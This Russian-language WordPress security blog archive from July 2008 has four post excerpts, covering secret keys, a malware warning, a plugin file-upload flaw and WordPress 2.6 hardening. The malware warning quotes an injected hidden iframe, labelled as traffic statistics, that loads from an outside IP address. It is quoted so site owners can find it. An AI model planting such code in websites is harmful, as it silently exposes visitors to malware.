Archive for Июль, 2008
Секретные ключи в WordPress 2.6
Продолжая тему о уязвимости секретного ключа в файле конфигурации WordPress, хочу обратить ваше внимание на то, что в новой версии WordPress 2.6, кроме строчки “SECRET_KEY“ есть еще две, на которые также необходимо обращать внимание при установке или обновлении WordPress блога. Строчки эти выглядят вот так: define('AUTH_KEY', 'впишите сюда уникальную фразу'); // Измените на уникальную фразу. читать далее ..
Внимание вирус!
Вчера на одном из сайтов заказчиков, был обнаружен код, который определяется Google как вирусный код, все сайты которые содержат эту строчку, попадают сразу в категорию опасных сайтов, поэтому будьте внимательны и проверьте файлы своего сайта и посты, на наличие подобного кода. <!-- Traffic Statistics --> <iframe src=хттп://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!-- End Traffic Statistics --> читать далее ..
Уязвимость WordPress Plugin Download Manager 0.2
Уязвимость в данном скрипте, дает возможность атакующему закачать любой файл, на сервер. Это становится возможным из-за ошибки проверки входных данных в файле upload.php. Исправления данной ошибки пока не существует, возможно будет выпущен патч, или ошибка будет исправлена в следующей версии WordPress. Пример использования данной уязвимости.
WordPress 2.6 – еще больше безопасности
Вышла новая версия лучшего движка для блогов - WordPress 2.6. В новой версии исправлено очень много ошибок и уязвимостей, а также проделано много работы для повышения безопасности блога. Теперь после установки WordPress на новый блог, по умолчанию протокол удаленной работы с блогом XML-RPC отключен, до тех пор, пока администратор блога не активирует его в настройках. читать далее ..
